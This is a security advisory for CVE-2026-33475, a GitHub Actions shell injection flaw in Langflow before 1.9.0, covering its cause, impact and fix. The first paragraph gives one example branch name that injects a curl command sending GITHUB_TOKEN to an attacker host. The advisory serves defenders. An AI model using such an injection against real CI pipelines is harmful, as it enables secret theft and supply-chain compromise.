Langflow, a tool for building AI-powered agents and workflows, contains a critical shell injection vulnerability (CVE-2026-33475) in its GitHub Actions workflows prior to version 1.9.0. The root cause is the unsanitized interpolation of GitHub context variables such as `${{ github.head_ref }}` and `${{ github.event.pull_request.title }}` directly into `run:` steps in workflow YAML files. Since these variables can be controlled by an attacker via branch names or pull request titles, they serve as vectors for injecting arbitrary shell commands. For example, a malicious branch name like `injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN` causes the injected command to execute during CI runs, leaking sensitive secrets such as the `GITHUB_TOKEN`. This token grants broad permissions within the repository, enabling attackers to push malicious code, manipulate releases, or compromise the supply chain. The affected files include multiple workflows and actions such as `deploy-docs-draft.yml`, `docker-build.yml`, and `install-playwright/action.yml`. The vulnerability requires no authentication or user interaction, making it highly exploitable in public forks with GitHub Actions enabled. The fix implemented in version 1.9.0 involves refactoring workflows to assign user-controlled values to environment variables and wrapping them in double quotes to prevent shell injection. Direct interpolation inside `run:` steps is avoided to ensure proper sanitization. This vulnerability is classified under CWE-74 and CWE-78, highlighting improper neutralization of special elements and command injection risks. Although no known exploits are reported in the wild yet, the critical CVSS score of 9.1 underscores the urgency of patching.

The impact of CVE-2026-33475 is severe for organizations using Langflow with GitHub Actions enabled, especially public repositories or forks. Exploitation allows unauthenticated attackers to execute arbitrary shell commands within the CI environment, leading to full compromise of CI secrets such as `GITHUB_TOKEN`. This token can be used to push malicious code, tamper with releases, inject backdoors, or exfiltrate sensitive infrastructure data. The vulnerability effectively grants attackers remote code execution capabilities in the CI/CD pipeline, undermining the integrity and confidentiality of the software supply chain. Organizations relying on Langflow for AI workflows risk supply chain attacks, unauthorized deployments, and leakage of proprietary or sensitive information. The ease of exploitation without authentication or user interaction increases the likelihood of automated attacks. The scope includes any public fork or repository using vulnerable Langflow versions with GitHub Actions enabled, potentially affecting open source contributors and organizations integrating Langflow into their pipelines. This can lead to reputational damage, operational disruption, and compliance violations if exploited.

To mitigate this vulnerability, organizations should immediately upgrade Langflow to version 1.9.0 or later where the issue is patched. For existing workflows, refactor all GitHub Actions workflows and custom actions to avoid direct interpolation of user-controlled GitHub context variables inside `run:` shell commands. Instead, assign these variables to environment variables and wrap them in double quotes to ensure proper shell escaping. For example, use `env: BRANCH_NAME: ${{ github.head_ref }}` and reference `$BRANCH_NAME` inside the script with quotes. Additionally, restrict repository permissions and secrets exposure in GitHub Actions by applying the principle of least privilege to tokens like `GITHUB_TOKEN`. Consider enabling branch protection rules and limiting who can create pull requests or branches that trigger workflows. Monitor CI logs for suspicious command executions and audit workflow files regularly for unsafe interpolations. Employ automated scanning tools to detect injection risks in CI/CD configurations. Finally, educate developers and DevOps teams about secure GitHub Actions practices to prevent similar injection flaws.